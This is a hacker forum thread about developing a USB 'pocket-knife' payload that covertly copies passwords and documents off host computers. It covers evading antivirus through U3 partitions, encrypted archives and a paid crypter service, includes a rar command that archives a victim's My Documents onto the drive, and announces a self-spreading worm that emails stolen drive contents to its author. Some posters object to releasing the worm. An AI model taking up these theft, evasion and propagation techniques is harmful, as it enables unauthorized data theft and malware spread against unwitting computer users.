Jump to content

USB Pocket-Knife Development


Leapo
 Share

Recommended Posts

If GonZor and Leapo collaborated, their payload would be amazing.

Is elmer trying to hint at something?

It is not a real issue this is the but payload is the best I have seen for non u3, where Gonzor has  the best u3 version. both are excellent, and I am sure everyone can't wait for the next releases. Keep up the good work gentlemen.

Wow, I feel special. Soon after V2.0 I will have a non-U3 version available, using true crypt volumes to protect it. Although the only advantage to using that would be the easy customization which is the basis for my payload, and the reason V2.0 is taking longer than expected.

Link to comment
Share on other sites

  • Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

If GonZor and Leapo collaborated, their payload would be amazing.

Is elmer trying to hint at something?

Me? Hint at something? No way, Jose.

Wow, I feel special.

You should feel special. You made the best U3 payload out there, all the while keeping your towel with you. You are a man to be reckoned with.

Link to comment
Share on other sites

Its possible with some modification to get this payload running from the U3 partition although you would either need a massive change in the setup, else it wouldn't be configurable.
I could probably make my payload work completely off of the CD partition if I ran a few global replacements to correct the paths. The main issue is that I would need to buy a U3 drive to test it on...

As for customization, I've had an interesting idea for the U3 version of my payload, and I don't think it's ever been done before. Instead of putting the entire switchblade on the CD partition, I'll only put the actual executables themselves (which keeps them safe from deletion), and I'll keep the batch files on the flash partition (for easy editing). This Hybrid payload would be the best of both worlds, antivirus can't nuke the executables, and you can still edit the batch files without re-flashing the CD partition every time.

I would, or course, also maintain my non-U3 payload, using either my backup and restore script or TrueCrypt to protect the payload.

You know GonZor, maybe Elmer and Setzer are right, maybe we should combine our efforts. We're working towards a common goal here, we both have some innovative ideas...What do you say GonZor?  :)

...all the while keeping your towel with you. You are a man to be reckoned with.
Hehe, nice little Hitchhikers reference ;)

wow the back up idea looks pretty good, i will download it and give it a shot
Let me know how that's working out for you. The encrypted RAR method is easier to manage by the end user of the payload, but TrueCrypt is more secure. I'm going to include both methods as optional modules (configurable via start.bat) as long as rar turns out to be mildly successful.
Link to comment
Share on other sites

the rar back up works ok, but it backs up everything on the drive, this becomes time consuming when you have 1.5 gigs or  personal document on the switchblade (i move work files around the office, maybe you should limit it to only back up the switchblade specific files? or even better have the option for one or the other.

Link to comment
Share on other sites

the rar back up works ok, but it backs up everything on the drive, this becomes time consuming when you have 1.5 gigs or  personal document on the switchblade (i move work files around the office, maybe you should limit it to only back up the switchblade specific files? or even better have the option for one or the other.
That's the first thing I'm planning on fixing; the next version of my payload will come with an updated version of my backup script that only backs up files that'll trip an antivirus, meaning that both the backup and restore functions will take much less time.

Look out for a release soon :smile:

Link to comment
Share on other sites

Yeah, I probably would probably be putting a  lot more effort into a U3 version if I had a U3 drive to use it with myself. :P

My 4GB drive is starting to act up (It's starting to lose information, probably due to WAY to many write cycles), so I might be in the market for a replacement flash drive anyway. I remember paying $60 for this non-U3 4GB flash drive, how much do 4GB U3 drives usually run?

The payload itself is only a little over 16mb (a little more after the backup is created), so a 32mb flash drive would fit the payload and leave room for a few logs. If you like to do file slurping, though, a 4GB (or larger) drive is kinda a requirement, considering all the crap people tend to throw on their desktops and in their My Documents folders.

Edit: I'm working on that new backup script now, but I need to know exactly what files set off various Antivirus solutions so I can backup the minimum amount of files. I don't want to backup more than I need to, because doing so makes the archive larger and increases the time needed to restore the backup.

I'm using Avast, and it only picks up the following:

- csrss.exe

- mailpv.exe

- sbs.exe

Link to comment
Share on other sites

This drive is similar to mine the only diff is mine has a metal case that can withstand 200lbs crushing force, shock resistant, and washingmaching proof (I have tested all three =P )

SanDisk Cruzer Micro U3 4GB Flash Drive    $38.99+$4.99 S/H= ~$45.00

http://www.newegg.com/Product/Product.aspx...N82E16820171121

This might be the best bet, it also has a one year warranty so even if you write it to death you can turn it in, lol.

Link to comment
Share on other sites

Yeah, I just took a look around newegg myself, and that does appear to be the cheapest 4GB U3 flash drive around...is it just me, or are flash drive prices tanking hard?

Anyway, I ordered the flash drive, total price came out to $46.81

Now don't think I won't be maintaining my non-U3 payload just because I'll have a U3 flash drive, I'll be maintaining both code bases equally...once I have a U3-only code base to maintain, that is :lol:

Link to comment
Share on other sites

There used to be a site, il find it again, it was a service where you sent these guys a rar and they would encrypt all the files inside so they wouldnt be traced by AV software (they ran it through morphine, a hex editor, packer, and a binder) It was like $25. that may be of intrest to you but then again if we distribute it to widly the av software will find out and all would be for nothing.

Link to comment
Share on other sites

Yeah, I'll stick with standard RAR encryption. It has quite a few plusses:

- It makes it easier for the end user to update the archive when they make a change (using the included script).

- If I wanted to get paranoid, I could change the key every time I release a new version.

- Users can set their own custom encryption key with a simple edit of my two batch files, which would completely the signature of the archive.

I any case, this is just a temporary solution until I get around to implementing TrueCrypt (which will require many of the same edits as the U3 payload).

I figure this is about as good a time as any for a release. Here's version 0.4 of my payload with the fixed up backup and restore scripts. These updated scripts should prevent other data (and the logs folder for that matter) from being constantly backed up and restored.

http://rapidshare.com/files/38331130/Pocke...fe_b04.zip.html

I'll throw up a few more mirrors and update my first posts in a little while, I just wanted to throw this up now so you guys could give it a shot. I'm really interested to see how different antiviruses will react to the restore function (it's turned on by default in this build).

Edit: First post updated with download link, code samples, and semi-complete change log (I'm sure I'm forgetting something, can't remember what...)

Link to comment
Share on other sites

Since you already have RAR, you could RAR up the slurped files, to make it easier on the Thumb Drive's Capacity. Oh: Mirrors! FileSend, Deposit Files, MegaUpload, MiHD.net, and MooLoad.
It wasn't included with the release of 0.4, but I'm half finished reworking  fc_slurp.bat and fc_slurp2.bat...for the third time. I should have thought of using rar.exe to do slurping in the first place, smaller files, and it preserved directory structure within the archive (unlike fc.exe). These new versions of slurp should be in the next release.

Once again, thank you for your help with the mirrors, by the time I finished uploading to MegaUpload you had already posted! :P

I've updated my original posts to reflect the version change, and put your new mirrors up in the download post.

Oh, and for anybody wondering why I'm still calling this beta, it's because there's still broken code that's been disabled. As soon as everything in the broken code section (my 3rd original post) has been fixed, I'll probably jump straight to version 1.0 and remove the beta tag. As soon as I've finished up the new rar slurp method, I'm going to sit down with those two modules for a while and see if I can sort them out.

Now, if anybody else would like to pitch in before-hand, I wouldn't mind in the least :lol:

Link to comment
Share on other sites

Since you already have RAR, you could RAR up the slurped files, to make it easier on the Thumb Drive's Capacity. Oh: Mirrors! FileSend, Deposit Files, MegaUpload, MiHD.net, and MooLoad.

It wasn't included with the release of 0.4, but I'm half finished reworking  fc_slurp.bat and fc_slurp2.bat...for the third time. I should have thought of using rar.exe to do slurping in the first place, smaller files, and it preserved directory structure within the archive (unlike fc.exe). These new versions of slurp should be in the next release.

It's very simple to do.

rar a "C:Documents and Settings%username%My Documents*.*" %~d0%computername%.rar

Once again, thank you for your help with the mirrors, by the time I finished uploading to MegaUpload you had already posted! :P

I've updated my original posts to reflect the version change, and put your new mirrors up in the download post.

You could do a thing like this: MegaUpload (2)

Where the 2 is the one that is not the MegaUpload

Link to comment
Share on other sites

Ok guys, I've gone and done it, I've added the ability to have the hacksaw self propagate.

Yeah, you heard that right, this is the "Hacksaw Worm" Darren warned about on 2x03.

- You plug your Master Self Propagating Hacksaw into a target computer, infecting it.

- Any drives plugged into this computer will have their contents dumped and e-mailed to you.

- The infected computer will copy a mini-payload to the flash drive its just finished dumping files from.

- These newly infected flash drives will now automatically infect other computers, which in-turn will infect other flash drives, etc, etc, etc.

- Not only will this mini-payload self propagate, it also uses my auto-restore script to heal itself.

This will be included with v0.5, along with the auto-compression of slurped files.

My god...what have done? :shock:

Disclaimer: This feature is included for educational purposes only, and is disabled by default. :lol:

Link to comment
Share on other sites

Ok guys, I've gone and done it, I've added the ability to have the hacksaw self propagate.

This will be included with v0.4, along with the auto-compression of slurped files.

My god...what have done? :shock:

I was waiting for someone to do this. And, don't you mean Payload v0.5?

Link to comment
Share on other sites

Oops, screwed up my own version numbering! *fixed*

And yeah, I got tired of people talking about it, saying it could be done, and then not delivering the goods!

I think there is a good reason this wasn't "done" so to speak, yes many people have already "done" it but have not released it to the public for the simple fact that this can cause major problems. As much as I'd love to release my version I don't think it is appropriate. I feel a HakSaw worm gives Hak5 a bad name, this is the same as the 'folding at home installer' although that was working for the greater good. I'd like to hear other peoples opinions on a HakSaw worm being released.

Link to comment
Share on other sites

You do have a point...perhaps a poll should be held (in its own thread) to decide on the release-ability of a Hacksaw-worm?

The problem is all the people that have no idea what they are doing and how much damage this could actually cause, will vote for a release. I would like to hear input from people like the Hak5 crew, VaKo, Sparda and people along those lines who have been here for a long time. I honestly believe releasing this would be very bad.

Link to comment
Share on other sites

I've been thinking about how this could spread, and who's hands the hacksaw could pass through (with your e-mail address embedded in it no less). There is no denying that it could cause massive amounts of damage, and I've come to the conclusion that even if the higher-ups give the green light on posting more dangerous code like this, the version I release will be neutered so that it can only propagate one time.

And I do mean one time and one time only; Any computer infected with your "master key" will only auto infect one flash drive, which will be able to infect only one computer before it auto-deletes itself, and the computer it infects will not be given the ability to auto propagate again.

Far less dangerous than letting it spread exponentially, but it still gives you a taste (and if you plan it just right, the ability to get the hacksaw onto a specific persons PC).

Link to comment
Share on other sites

As much as I love the hacksaw worm I do agree, it will hurt more then it is worth. It is a great Idea I would use it at work here so i could see who is using a usb drive ( not allowed to normal employees ). In that application it would be helpful. The limitation of one infection is a good idea with that it will serve as a viable POC. I guess im casting my vote with Gonzor, no public release of full hacksaw worm.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...